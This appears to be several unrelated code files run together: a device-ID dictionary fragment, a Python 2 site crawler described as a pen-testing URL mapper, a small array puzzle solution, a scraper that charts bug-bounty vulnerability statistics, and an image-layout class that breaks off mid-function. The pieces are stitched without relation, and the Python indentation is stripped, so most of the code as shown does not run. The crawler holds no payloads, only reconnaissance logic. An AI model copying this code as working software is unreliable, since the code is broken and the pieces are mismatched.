0x1831800e: 'PM_DEV_TCM_1_B',
0x1831c00f: 'PM_DEV_L2_BANK_0',
0x18320010: 'PM_DEV_DDR_0',
0x18224018: 'PM_DEV_USB_0',
0x18224019: 'PM_DEV_GEM_0',
0x1822401a: 'PM_DEV_GEM_1',
0x1822401b: 'PM_DEV_SPI_0',
0x1822401c: 'PM_DEV_SPI_1',
0x1822401d: 'PM_DEV_I2C_0',
0x1822401e: 'PM_DEV_I2C_1',
0x1822401f: 'PM_DEV_CAN_FD_0',
0x18224020: 'PM_DEV_CAN_FD_1',
0x18224021: 'PM_DEV_UART_0',
0x18224022: 'PM_DEV_UART_1',
0x18224023: 'PM_DEV_GPIO',
0x18224024: 'PM_DEV_TTC_0',
0x18224025: 'PM_DEV_TTC_1',
0x18224026: 'PM_DEV_TTC_2',
0x18224027: 'PM_DEV_TTC_3',
0x18224028: 'PM_DEV_SWDT_LPD',
0x18224029: 'PM_DEV_SWDT_FPD',
0x1822402a: 'PM_DEV_OSPI',
0x1822402b: 'PM_DEV_QSPI',
0x1822402c: 'PM_DEV_GPIO_PMC',
0x1822402d: 'PM_DEV_I2C_PMC',
0x1822402e: 'PM_DEV_SDIO_0',
0x1822402f: 'PM_DEV_SDIO_1',
0x18224034: 'PM_DEV_RTC',
0x18224035: 'PM_DEV_ADMA_0',
0x18224036: 'PM_DEV_ADMA_1',
0x18224037: 'PM_DEV_ADMA_2',
0x18224038: 'PM_DEV_ADMA_3',
0x18224039: 'PM_DEV_ADMA_4',
0x1822403a: 'PM_DEV_ADMA_5',
0x1822403b: 'PM_DEV_ADMA_6',
0x1822403c: 'PM_DEV_ADMA_7',
0x1822403d: 'PM_DEV_IPI_0',
0x1822403e: 'PM_DEV_IPI_1',
0x1822403f: 'PM_DEV_IPI_2',
0x18224040: 'PM_DEV_IPI_3',
0x18224041: 'PM_DEV_IPI_4',
0x18224042: 'PM_DEV_IPI_5',
0x18224043: 'PM_DEV_IPI_6',
0x18428044: 'PM_DEV_SOC',
0x18520045: 'PM_DEV_DDRMC_0',
0x18520046: 'PM_DEV_DDRMC_1',
0x18520047: 'PM_DEV_DDRMC_2',
0x18520048: 'PM_DEV_DDRMC_3',
0x1862c049: 'PM_DEV_GT_0',
0x1862c04a: 'PM_DEV_GT_1',
0x1862c04b: 'PM_DEV_GT_2',
0x1862c04c: 'PM_DEV_GT_3',
0x1862c04d: 'PM_DEV_GT_4',
0x1862c04e: 'PM_DEV_GT_5',
0x1862c04f: 'PM_DEV_GT_6',
0x1862c050: 'PM_DEV_GT_7',
0x1862c051: 'PM_DEV_GT_8',
0x1862c052: 'PM_DEV_GT_9',
0x1862c053: 'PM_DEV_GT_10',
0x18330054: 'PM_DEV_EFUSE_CACHE',
0x18224055: 'PM_DEV_AMS_ROOT',
0x18224072: 'PM_DEV_AIE',
0x18224073: 'PM_DEV_IPI_PMC',
}
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import requests
from bs4 import BeautifulSoup
import re
from urlparse import urlparse
from urlparse import urljoin
from urlparse import urlunsplit
from urlparse import parse_qs
import os, sys
import timeit
import hashlib
import random
import sqlite3
import base64
import argparse
# drop table
def drop_table(table_name):
try:
query = "DROP table IF EXISTS %s" %(table_name)
cur.execute(query)
conn.commit()
print "drop %s table" %(table_name)
except Exception as e:
print e
print "can't drop %s table" %(table_name)
# create table
def create_table(table_name):
try:
query = "CREATE TABLE IF NOT EXISTS " + table_name + \
"(id INTEGER PRIMARY KEY NOT NULL,"\
"url text unique,"\
"res_code text,"\
"res_content text,"\
"verb text,"\
"admin text,"\
"integer_overflow text,"\
"buffer_overflow text,"\
"sqli text,"\
"xss text,"\
"lfi text,"\
"rfi text)"
cur.execute(query)
conn.commit()
print "created %s table" %(table_name)
except Exception as e:
print e
print "can't create %s table" %(table_name)
# insert the url, response code, and response content
# if you save response content, the size will grow up
def insert_data(url, res_code, res_content):
try:
cur.execute("select url from " + table_name + " where url == (?)", [url])
if cur.fetchone() is None:
cur.execute("insert into " + table_name + " (url, res_code) values(?, ?)", [url, res_code])
# res_content = base64.b64encode(res_content)
# cur.execute("insert into " + table_name + " (url, res_code, res_content) values(?, ?, ?)", [url, res_code, res_content])
conn.commit()
print "insert the %s" %(url)
else:
print "you already visited the %s" %(url)
except Exception as e:
print e
# after finish scanning, it will show the summary
def result_sumarize(table_name):
try:
cur.execute("select count(url) from " + table_name)
url_number = cur.fetchone()[0]
cur.execute("select count(url) from " + table_name + " where res_code == '200'")
res_code_200 = cur.fetchone()[0]
cur.execute("select count(url) from " + table_name + " where res_code == '404'")
res_code_404 = cur.fetchone()[0]
cur.execute("select count(url) from " + table_name + " where res_code == '500'")
res_code_500 = cur.fetchone()[0]
cur.execute("select url from " + table_name)
urls = []
for row in cur:
urls.append(row[0])
return urls, url_number, res_code_200, res_code_404, res_code_500
except Exception as e:
print e
pass
# extract url from form_tag
def scoop_forms_beautiful_soup(html_page_contents, url):
action = ""
url_scheme = urlparse(url)[0]
url_location = urlparse(url)[1]
# res_content = base64.b64decode(html_page_contents)
# html_page_contents = unicode(html_page_contents, 'euc-kr').encode('utf-8')
b = BeautifulSoup(html_page_contents)
result = set([])
for tag in b.findAll('form'):
try:
if tag["action"]:
action = urlunsplit((url_scheme, url_location, tag["action"], "", ""))
result.add(action)
except Exception as e:
pass
return result
# extract url from a tag
def scoop_hrefs_beautiful_soup(html_page_contents):
links = []
try :
b = BeautifulSoup(html_page_contents)
except :
pass
else:
for tag in b.findAll('a', href=True):
links.append(tag['href'])
return links
href_regexp = re.compile('<a\s+href\s*?="\s*?(.*?)"', \
re.IGNORECASE | re.MULTILINE)
# extract href tag
def scoop_hrefs_regexp(html_page_contents):
return href_regexp.findall(html_page_contents)
# union tags from scoop_forms_beautiful_soup and scoop_hrefs_beautiful_soup
def scoop_hrefs(html_page_contents, url):
return set.union(set(scoop_hrefs_beautiful_soup(html_page_contents)), \
set(scoop_hrefs_regexp(html_page_contents)),\
scoop_forms_beautiful_soup(html_page_contents, url))
# extract the domain name
def domain_name(url):
return urlparse(url)[1]
# a.jsp -> http://test.com/a.jsp
def href2url(originating_page, href):
# if href starts with http
if href.find("http") != -1:
href = href.strip()
return href
else:
href = href.strip()
try:
pieces = urlparse(urljoin(originating_page, href))
except Exception as e:
# print e
return ""
url_scheme = pieces[0]
url_location = pieces[1]
url_path = pieces[2]
url_parameter = pieces[3]
url_query = pieces[4]
# don't follw http://www.google.com/q=test
# return urlunsplit((url_scheme, url_location, url_path, "", ""))
# follw http://www.google.com/q=test
return urlunsplit((url_scheme, url_location, url_path, url_query, url_parameter))
def extract_all_href_links(page_contents, url_matching_pattern):
base_pattern = urlparse(url_matching_pattern)[1]
links_on_page = scoop_hrefs(page_contents, url_matching_pattern)
universal_links = set([])
for link in links_on_page:
u = href2url(url_matching_pattern, link)
# urlparse(u)[1].find(base_pattern) != -1 to get rid of http://www.facebook.com/sharer/sharer.php?s=100&p[url]=http%3A%2F%2Fwww.test.com%2Fbbs%2Fboard.php
if (u.startswith('http')) and urlparse(u)[1].find(base_pattern) != -1:
universal_links.add(u)
return universal_links
def file_extension(filename) :
(base, ext) = os.path.splitext(filename)
if (ext == '.' or ext == ''):
return ''
else :
return ext[1:]
terminal_extensions = set([ \
# text file extensions
'doc', 'docx', 'log', 'msg', 'pages','rtf', 'tt', 'wpd', 'wps', 'css', \
# data file extensions
'accdb', 'blg', 'dat', 'db', 'efx','mdb', 'pdb', 'pps', 'ppt', \
'pptx', 'sdb', 'sdf', 'sql', 'vcf', 'wks','xls', 'xlsx', \
# image file extensions
'bmp', 'gif', 'jpg', 'png', 'psd', 'psp','thm', 'tif', 'tiff' ,\
'ai', 'drw', 'eps', 'ps', 'svg', \
'3dm', 'dwg', 'dxf', 'pln', \
'indd', 'pct', 'pdf', 'qxd', 'qxp','rels', \
# audio file extensions
'aac', 'aif', 'iff', 'm3u', 'mid', 'mp3','mpa', 'ra', 'wav', 'wma' , \
# video file extensions
'3g2', '3gp', 'asf', 'asx', 'avi', 'flv','mov', 'mp4', 'mpg', \
'rm', 'swf', 'vob', 'wmv', \
# executable file extensions
'sys', 'dmp', 'app', 'bat', 'cgi', 'exe','pif', 'vb', 'ws', \
# compressed file extensions
'deb', 'gz', 'pkg', 'rar', 'sit', 'sitx','tar', 'gz', 'zip', 'zipx' , \
# programming file extensions
'c', 'cc', 'cpp', 'h', 'hpp', 'java', 'pl','f', 'for' , \
# misc file extensions
'dbx', 'msi', 'part', 'torrent', 'yps','dmg', 'iso', 'vcd' , \
# more_audio_file_extensions
'4mp', 'aa3', 'aac', 'abc', 'adg', 'aif','aifc', 'aiiff', \
'awb', 'cda', 'cdib', 'dcm', 'dct','dfc', 'efa', 'f64', 'flac', \
'flp', 'g726', 'gnt', 'imy', 'kfn', 'm3u','m4a', 'm4p', 'm4r', \
'mid', 'midi', 'mio', 'mmf', 'mp3','mpa', 'mpu', 'msv', 'mt2', \
'mte', 'mtp', 'mzp', 'oga', 'ogg','omg', 'pvc', 'ra', 'ram', \
'rif', 'ul', 'usm', 'vox', 'wav', 'wma', \
# data_backup_file_extensions
'abbu', 'alub', 'asd', 'bac', 'bak','bbb', 'bks', 'bup', 'dkb', \
'dov', 'bk', 'nbf', 'qbb', 'qbk', 'tmp','xlf', \
# video_file_extensions
'aaf', 'asf', 'avi', 'cvc', 'ddat', 'divx','dmb', 'dv', \
'evo', 'f4v', 'flc', 'fli', 'flv', 'giv','m1pg', 'm21' \
'mj2', 'mjp', 'mp4', 'mp4v', 'mpeg','mpeg4', 'mpg2', \
'mts', 'svi', 'tivo', 'vob', 'wmv','wmmp', \
])
def has_http_in_path(url):
c = urlparse(url)
if (c[2].find('http') >= 0) or(c[3].find('http') >= 0):
return True
else:
return False
def decide_which_links_to_follow(terminal_extensions, page_links):
links_to_follow = set([])
for link in page_links:
if ( (link.find(cononical_url) != -1 )and \
(file_extension(link).lower()not in terminal_extensions) and
(not has_http_in_path(link))):
links_to_follow.add(link)
return links_to_follow
def add_links_to_frontier_1(page_links, links_to_visit):
links_to_visit.add(page_links)
return links_to_visit
def add_links_to_frontier_2(page_links, url_matching_pattern):
links_not_to_visit = {}
links_not_to_visit[url_matching_pattern] = []
if len(page_links) > 0:
for page_link in page_links:
links_not_to_visit[url_matching_pattern].append(page_link)
return links_not_to_visit
def add_links_to_frontier_3(page_contents_enc, links_to_visit_enc):
if type(page_contents_enc) == str:
links_to_visit_enc.add(page_contents_enc)
return links_to_visit_enc
return links_to_visit_enc
def add_links_to_frontier_4(page_links, links_to_visit_params):
links_to_visit_params.add(page_links)
return links_to_visit_params
def add_404_pages(page_links, page_code_404):
page_code_404.add(page_links)
return page_code_404
def add_500_pages(page_links, page_code_500):
page_code_500.add(page_links)
return page_code_500
def make_baseurl(url):
url_tmp = urlparse(url)
url_1 = url_tmp[0]
url_2 = url_tmp[1]
url_3_start = url_tmp[2].rfind("/")
url_3 = url_tmp[2][:url_3_start + 1]
return urlunsplit((url_1, url_2, url_3,'', ''))
def done_check(links_not_to_visit, links_to_visit):
for link_key in links_not_to_visit.keys():
for link in links_not_to_visit[link_key]:
if link not in links_to_visit:
return False
return True
def array_to_string(arrays):
if arrays:
strings = ','.join(arrays)
return strings.replace(",", "\r\n")
return ""
def get_all_links(url, url_matching_pattern, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params):
user_agents = ["Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36", \
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36", \
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36", \
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2", \
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0", \
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0", \
"Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))", \
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)"
]
try:
payloads = parse_qs(urlparse(url).query)
# from {u'action': [u'M01']} to {u'action': u'M01'}
for name in payloads.keys():
payloads[name] = payloads[name][0]
# test.com/goods_list.php?Index=291 -> /goods_list.php['Index']
url_with_params = str(urlparse(url)[2]) + str(sorted(payloads.keys()))
links_to_visit_params = add_links_to_frontier_4(url_with_params, links_to_visit_params)
links_to_visit = add_links_to_frontier_1(url, links_to_visit)
# cookie check
if cookie is None:
res = requests.get(url,\
timeout = 0.8,\
headers = {"User-Agent" : random.choice(user_agents)},\
verify = False)
else:
res = requests.get(url,\
timeout = 0.8,\
headers = {"User-Agent" : random.choice(user_agents),\
"Cookie" : cookie},\
verify = False)
res_contents = res.content
res_code = res.status_code
insert_data(url, str(res_code), res_contents)
if (res_code == 200):
page_contents_enc = hashlib.sha1(res_contents).digest().encode("hex")
if page_contents_enc not in links_to_visit_enc:
links_to_visit_enc = add_links_to_frontier_3(page_contents_enc, links_to_visit_enc)
url_base = make_baseurl(url_matching_pattern)
page_links = extract_all_href_links(res_contents, url_base)
follow_links = decide_which_links_to_follow(terminal_extensions, page_links)
links_not_to_visit = add_links_to_frontier_2(follow_links, url)
return links_not_to_visit, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params
else:
return {}, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params
elif res_code == 404:
page_code_404 = add_404_pages(url, page_code_404)
return {}, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params
elif res_code == 500:
page_code_500 = add_500_pages(url, page_code_500)
return {}, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params
else:
return {}, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params
except (KeyboardInterrupt, SystemExit):
urls, url_number, res_code_200, res_code_404, res_code_500 = result_sumarize(table_name)
cur.close()
end_time = timeit.default_timer()
print "*" * 120
for url in urls:
print url
print "*" * 120
print "the number of all url is %s" % (url_number)
print "the number of url with code 200 is %s" % (res_code_200)
print "the number of url with code 404 is %s" % (res_code_404)
print "the number of url with code 500 is %s" % (res_code_500)
print '\nwebcrwal is done: ', end_time - start_time
sys.exit(0)
except Exception as e:
return {}, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params
else:
return {}, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params
def not_to_visit_urls(links_not_to_visit, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params):
if links_not_to_visit == {}:
return links_not_to_visit, links_to_visit, links_to_visit_enc
links_not_to_visit_new = {}
for link_key in links_not_to_visit.keys():
for link in links_not_to_visit[link_key]:
if link not in links_to_visit:
url = link
payloads = parse_qs(urlparse(url).query)
# from {u'action': [u'M01']} to {u'action': u'M01'}
for name in payloads.keys():
payloads[name] = payloads[name][0]
# test.com/goods_list.php?Index=291 -> /goods_list.php['Index']
url_with_params = str(urlparse(url)[2]) + str(sorted(payloads.keys()))
if url_with_params not in links_to_visit_params:
# ex) index.do?m=A01 and index.do?m=A01 are totally different
# change it to "if url_with_params not in {}:"
url = link
url_matching_pattern = make_baseurl(url)
results = get_all_links(url, url_matching_pattern, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params)
links_not_to_visit_new = dict(results[0], **links_not_to_visit_new)
links_to_visit = results[1]
links_to_visit_enc = results[2]
page_code_404 = results[3]
page_code_500 = results[4]
links_to_visit_params = results[5]
return links_not_to_visit_new, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params
def main():
usage = '''./web_crwaler.py -u http://www.google.com -p google.com -t google'''
parser = argparse.ArgumentParser(description = "url crwaler for pen testing", \
usage = usage)
parser.add_argument("-u", "--url", required=True, help="target domain")
parser.add_argument("-p", "--pattern", required=True, help="string to find target domain")
parser.add_argument("-c", "--cookie", required=False, help="cookie")
parser.add_argument("-m", "--modify", required=False, help="update the result from previsous table, ex)-u yes")
parser.add_argument("-t", "--table", required=True, help="table name")
parser.add_argument("-v", "--version", action='version', version = 'JongWon Kim (dikien2012@gmail.com)\n%(prog)s - v.1.0 (04/19/2014)')
args = parser.parse_args()
global cononical_url
# cononical_url = "192.168.10.9"
global table_name
# table_name = "wavsep"
url_to_start = args.url
cononical_url = args.pattern
table_name = args.table
update_table = args.modify
global cookie
cookie_filename = args.cookie
try:
f = open(cookie_filename).read()
cookie = str(f).strip()
except:
cookie = None
global conn
conn = sqlite3.connect("crawler.db")
conn.text_factory = str
global cur
cur = conn.cursor()
global start_time
start_time = timeit.default_timer()
# url_to_start ="http://192.168.10.9:8080/active/"
url_matching_pattern = url_to_start
links_not_to_visit = {}
links_to_visit = set([])
if update_table:
cur.execute("select url from " + table_name)
for row in cur:
links_to_visit.add(row[0])
links_to_visit_enc = set([])
links_to_visit_params = set([])
page_code_404 = set([])
page_code_500 = set([])
if not update_table:
drop_table(table_name)
create_table(table_name)
results = get_all_links(url_to_start,\
url_matching_pattern,\
links_to_visit,\
links_to_visit_enc,\
page_code_404,\
page_code_500,\
links_to_visit_params
)
links_not_to_visit, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params = results
while True:
links_not_to_visit, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params = not_to_visit_urls(links_not_to_visit, links_to_visit, links_to_visit_enc, page_code_404, page_code_500, links_to_visit_params)
if done_check(links_not_to_visit, links_to_visit):
urls, url_number, res_code_200, res_code_404, res_code_500 = result_sumarize(table_name)
cur.close()
end_time = timeit.default_timer()
print "*" * 120
for url in urls:
print url
print "*" * 120
print "the number of all url is %s" % (url_number)
print "the number of url with code 200 is %s" % (res_code_200)
print "the number of url with code 404 is %s" % (res_code_404)
print "the number of url with code 500 is %s" % (res_code_500)
print '\nwebcrwal is done: ', end_time - start_time
sys.exit()
if __name__ == "__main__":
main() |
class Solution:
def smallerNumbersThanCurrent(self, nums: List[int]) -> List[int]:
dic = [0]*101
for n in nums:
dic[n] += 1
return [sum(dic[0:n]) for n in nums]
|
# -*- coding:utf-8 -*-
# by:kracer
import re
import requests
import time
from threading import *
from multiprocessing import Process
from bs4 import BeautifulSoup as bs
import matplotlib.pyplot as plt
url0 = "https://src.sjtu.edu.cn/list/?page="
submitter_index_dic, edu_index_dic = {}, {}
datas = [] #承载爬虫获取的数据(列表形式)
bug_name = ["SQL", "CSRF", "SSRF", "XSS", "代码执行", "其他", "命令执行", "垂直权限", "弱口令", "敏感信息", "文件上传", "水平权限", "点击劫持"]
lock = Lock()
#爬取平台网站数据函数
def getData(a, num):
with open(r'edusrc.txt', 'w+', encoding='utf-8') as f:
for page in range((num + a - 300), (a+1)):
url = url0 + str(page)
r = requests.get(url=url)
r.encoding = r.apparent_encoding
soup = bs(r.text, 'lxml')
result = soup.find_all(name='tr', attrs={'class':'row'})
soup1 = bs(str(result), 'lxml')
result0 = soup1.find_all(name='a') #初始的a标签数据
result1 = [i.string for i in result0]
result1_new = [] #正则获取学校漏洞名称
for i in range(len(result1)):
if(i%2 == 0):
text = re.findall(r'(\w.*)', result1[i])
result1_new.append(text[0])
else:
continue
result2 = re.findall(r'<a.+>(.*)</a>', str(result0)) #正则匹配用户名
result3 = soup1.find_all(name='span') #高危 低危...
result3 = [i.string for i in result3]
for i in range(len(result1_new)): #写进txt文件
f.write(str(result1_new[i]) + '\t' + str(result2[i]) + '\t' + str(result3[i]) + '\n')
#设置多线程爬取函数
def Th(fuc, num):
t = []
for i in range(1, 21):
Th1 = Thread(target=fuc, args=(100*i, num,))
t.append(Th1)
for i in t:
i.start()
for j in t:
j.join()
#设置多进程爬取函数
def Pr(fuc, num):
t = []
for i in range(1, 11):
Pr1 = Process(target=fuc, args=(300*i, num,))
t.append(Pr1)
for i in t:
i.start()
for j in t:
j.join()
#对爬取所得数据进行处理
def process():
global datas, edu_index_list, submitter_index_dic
times = 0
edu_dic, submitter_dic = {}, {}
with open('edusrc.txt', 'r+', encoding='utf-8') as f:
for i in f.readlines():
i.rstrip('\n')
lis = i.split('\t')
if len(lis) == 3: #处理特殊数据报错情况
datas.append(i.split('\t'))
submitter_dic.setdefault(datas[times][1], {}) #初始化外层字典的key值
submitter_dic[datas[times][1]].setdefault(datas[times][2].rstrip('\n'), 0) #初始化内层字典的key值,并且赋值value=0
submitter_dic[datas[times][1]][datas[times][2].rstrip('\n')] += 1 #内层字典的value值 +1
try:
name = re.findall(r'(.*["学"|"院"|"厅"|"部"|"会"|"司"|"局"|"区"|"T"|"馆"|"他"|"心"])', datas[times][0])[0] #正则匹配学校名
except Exception as e:
print(datas[times][0])
edu_dic.setdefault(name, {})
edu_dic[name].setdefault(datas[times][2].rstrip('\n'), 0)
edu_dic[name][datas[times][2].rstrip('\n')] += 1
times += 1
else:
continue
for k_1, v_1 in edu_dic.items(): #计算每个大学的漏洞总数
v_1["总数"] = 0
for k_2 in v_1.keys():
if "总数" == k_2:
continue
else:
v_1["总数"] += v_1[k_2]
edu_dic_new = sorted(edu_dic, key=lambda x: edu_dic[x]["总数"], reverse=True)
for k_3, v_3 in submitter_dic.items(): #计算每个submitter的漏洞总数
v_3["总数"] = 0
for k_4 in v_3.keys():
if "总数" == k_4:
continue
else:
v_3["总数"] += v_3[k_4]
edu_dic_new = sorted(edu_dic, key=lambda x: edu_dic[x]["总数"], reverse=True)
submitter_dic_new = sorted(submitter_dic, key=lambda x: submitter_dic[x]["总数"], reverse=True)
for edu in edu_dic_new: #根据漏洞总数进行二重字典排序
edu_index_dic[edu] = edu_dic[edu]
for submitter in submitter_dic_new:
submitter_index_dic[submitter] = submitter_dic[submitter]
return datas, submitter_index_dic, edu_index_dic
#对用户输入查询年份的预处理函数
def processYear(year):
if year == "2021":
print("正在爬取{0}年数据......".format(year))
Pr(getData, 1)
print("数据采集完毕, 请选择下一步操作......")
processFinish()
elif year == "2020":
print("正在爬取{0}年数据......".format(year))
Pr(getData, 3000)
print("数据采集完毕, 请选择下一步操作......")
processFinish()
elif year == "2019":
print("正在爬取{0}年数据......".format(year))
Pr(getData, 5000)
print("数据采集完毕, 请选择下一步操作......")
processFinish()
else:
print("正在爬取{0}年数据......".format(year))
Pr(getData, 7000)
print("数据采集完毕, 请选择下一步操作......")
processFinish()
#数据采集完成后的分析操作预处理函数
def processFinish():
print("正在处理数据并进行分析可视化......")
process()
print("对edu大学|提交者进行排名分析并写进txt文件......")
edu_submitter_rank(datas, edu_index_dic, submitter_index_dic)
print("数据写入文件完成.......")
print("处理完毕,统计各类型漏洞数据......")
Tongji_bug(datas)
print("统计完毕,进行漏洞类型画饼图可视化......")
Huatu(dic_bug)
#对edu大学|提交者进行排名分析, 写进txt文件
def edu_submitter_rank(datas, edu_index_dic, submitter_index_dic):
for bug in bug_name:
for index_edu in edu_index_dic.keys():
edu_index_dic[index_edu].setdefault(bug, 0)
for index_submitter in submitter_index_dic.keys():
submitter_index_dic[index_submitter].setdefault(bug, 0)
for i in datas:
name = re.findall(r'(.*["学"|"院"|"厅"|"部"|"会"|"司"|"局"|"区"|"T"|"馆"|"他"|"心"])', i[0])[0] # 正则匹配学校名
submitter = i[1]
for j in bug_name:
if j in i[0]:
edu_index_dic[name][j] += 1
submitter_index_dic[submitter][j] += 1
with open('edu_rank.txt', 'w+', encoding='utf-8') as f, open('submitter_rank.txt', 'w+', encoding='utf-8') as f1:
for i in edu_index_dic.keys():
f.write(str(i) + '\n')
for j in edu_index_dic[i]:
f.write('\t' + str(j) + ":" + str(edu_index_dic[i][j]) + "个" + '\n')
for k in submitter_index_dic.keys():
f1.write(str(k) + '\n')
for l in submitter_index_dic[k]:
f1.write('\t' + str(l) + ":" + str(submitter_index_dic[k][l]) + "个" + '\n')
#对各类型漏洞数据进行统计画饼图可视化
def Tongji_bug(datas):
global dic_bug
dic_bug = {"SQL": 0, "CSRF": 0, "SSRF": 0, "XSS": 0, "代码执行": 0, "其他": 0, "命令执行": 0, "垂直权限": 0, "弱口令": 0, "敏感信息": 0, "文件上传": 0, "水平权限": 0, "点击劫持": 0}
for i in datas:
for j in bug_name:
if j in i[0]:
dic_bug[j] += 1
dic_bug = dict(sorted(dic_bug.items(), key=lambda k: k[1], reverse=True))
#对统计好的漏洞类型数据进行可视化(饼图)
def Huatu(data):
# 准备数据
data_list, label_list = [], []
for k, v in data.items():
data_list.append(v)
label_list.append(k)
title = "2020-2021年教育业漏洞排行榜"
plt.figure(figsize=(15, 15))
#显示的中文字体设置
plt.rcParams['font.family'] = 'SimHei'
# 将排列在第4位的语言(Python)分离出来
explode = [0, 0, 0, 0, 0, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5]
# 使用自定义颜色
colors = ['silver', 'cyan', 'khaki', 'pink', 'magenta', 'darkseagreen', 'm', 'teal', 'skyblue', 'tomato', 'green', 'yellowgreen', 'lime']
# colors = ['red', 'pink', 'magenta', 'purple', 'orange']
# 将横、纵坐标轴标准化处理,保证饼图是一个正圆,否则为椭圆
plt.axes(aspect='equal')
# 控制X轴和Y轴的范围(用于控制饼图的圆心、半径)
plt.xlim(0, 12)
plt.ylim(0, 12)
# 不显示边框
plt.gca().spines['right'].set_color('none')
plt.gca().spines['top'].set_color('none')
plt.gca().spines['left'].set_color('none')
plt.gca().spines['bottom'].set_color('none')
# 绘制饼图
plt.pie(x=data_list, # 绘制数据
labels=label_list, # 添加编程语言标签
explode=explode, # 突出显示Python
colors=colors, # 设置自定义填充色
autopct='%0.1f%%', # 设置百分比的格式,保留3位小数
pctdistance=0.8, # 设置百分比标签和圆心的距离
labeldistance=1.1, # 设置标签和圆心的距离
startangle=180, # 设置饼图的初始角度
center=(6, 5), # 设置饼图的圆心(相当于X轴和Y轴的范围)
radius=6, # 设置饼图的半径(相当于X轴和Y轴的范围)
counterclock=False, # 是否为逆时针方向,False表示顺时针方向
wedgeprops={'linewidth': 1, 'edgecolor': 'red'}, # 设置饼图内外边界的属性值
textprops={'fontsize': 11, 'color': 'black'}, # 设置文本标签的属性值
frame=1) # 是否显示饼图的圆圈,1为显示
# 不显示X轴、Y轴的刻度值
plt.xticks(())
plt.yticks(())
# 显示图形
# 添加图形标题
plt.title(title)
plt.show()
def main():
userChooes = input("是否需要进行数据爬取(y|n):")
if userChooes == "y":
chooesYear = input("请输入要爬取的年份:")
processYear(chooesYear)
process()
elif userChooes == "n":
processFinish()
else:
print("错误!请输入'Y'或者'n'")
if __name__ == "__main__":
main() |
import logging
import os
import cv2
import matplotlib.pyplot as plt
import numpy as np
from citlab_python_util.geometry.rectangle import Rectangle
from citlab_python_util.image_processing.image_stats import get_rotation_angle
from scipy.ndimage import interpolation as inter
logger = logging.getLogger("TextBlockNetPostProcessor")
# logging.basicConfig(level=logging.WARNING)
logging.basicConfig(level=logging.INFO)
MIN_PIXEL_SEPARATOR_DISTANCE_FACTOR = 0.003
MAX_RECURSION_DEPTH = 4
class TextBlockNetPostProcessor(object):
"""Comments / Workflow:
1.) the original image is used to calculate the rotation angle of the image -> better way to do this?
2.) the text block channel of the net output is used to calculate white runs in the image, i.e. separator
3.) the separator channel of the net output is used to extract visible separator from the image
4.) 2.) & 3.) are combined to provide a first partition into coarse regions (the number of columns should be visible)
5.) Iterate over the regions from the last step and use the separator and text block channel to provide more horizontal separator
6.) The resulting grid-like image can be used to divide the Page into text regions
won't work well for pages with
- images, since no image detection is provided for now -> coming
- complex layout, e.g. many advertisments -> check
"""
def __init__(self, original_image, text_block_outline, text_block, separator):
self.images = {'original_image': original_image, 'text_block_outline': text_block_outline,
'text_block': text_block, 'separator': separator,
'binarized_image': self.binarize_image(original_image),
'empty_image': np.zeros(original_image.shape, dtype=np.uint8)}
if not self.check_dimensions(*self.images.values()):
raise RuntimeError("Image shapes don't match.")
self.image_height, self.image_width = self.images['original_image'].shape
@staticmethod
def binarize_net_output(image, threshold):
return np.array((image > threshold), np.int32)
@staticmethod
def binarize_image(image, gaussian_blur=True):
if gaussian_blur:
res = cv2.GaussianBlur(image, (5, 5), 0)
else:
res = image
_, res = cv2.threshold(res, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
return res
def get_best_rotation_angle(self):
rotation_angle_binarized_image = get_rotation_angle(self.images['binarized_image'])[1]
rotation_angle_textblock_image = get_rotation_angle(self.images["text_block"])[1]
print(f"Rotation angle determined by the binarized image: {rotation_angle_binarized_image}")
print(f"Rotation angle determined by the text block image: {rotation_angle_textblock_image}")
return rotation_angle_binarized_image
# return get_rotation_angle(self.images['binarized_image'])[1]
@staticmethod
def check_dimensions(*images):
return all(image.shape == images[0].shape for image in images)
def rotate_images(self, angle):
logger.info(f"Rotate images by {angle} degrees.")
for img_name, img in self.images.items():
self.images[img_name] = inter.rotate(img, angle, reshape=False, order=0)
@staticmethod
def get_separators(image, mode='horizontal', threshold=0.1):
""" This function looks for separators in an image `image`. By default it looks for white runs in the image by
adding up the pixel values across the x or y dimension depending on the `mode` parameter and check if it exceeds
a given threshold given by the parameter `threshold`. If you're looking for black runs, just invert the image.
:param image: input image
:param mode: can be one of 'horizontal' (0) or 'vertical' (1)
:param threshold: the value the sum of the pixels must exceed to be defined as a white run
:return: A list of tuples containing the row/column where a white run is present together with its relative score value.
"""
if type(mode) == str:
if mode.lower() == 'horizontal':
mode = 0
elif mode.lower() == 'vertical':
mode = 1
if mode not in [0, 1]:
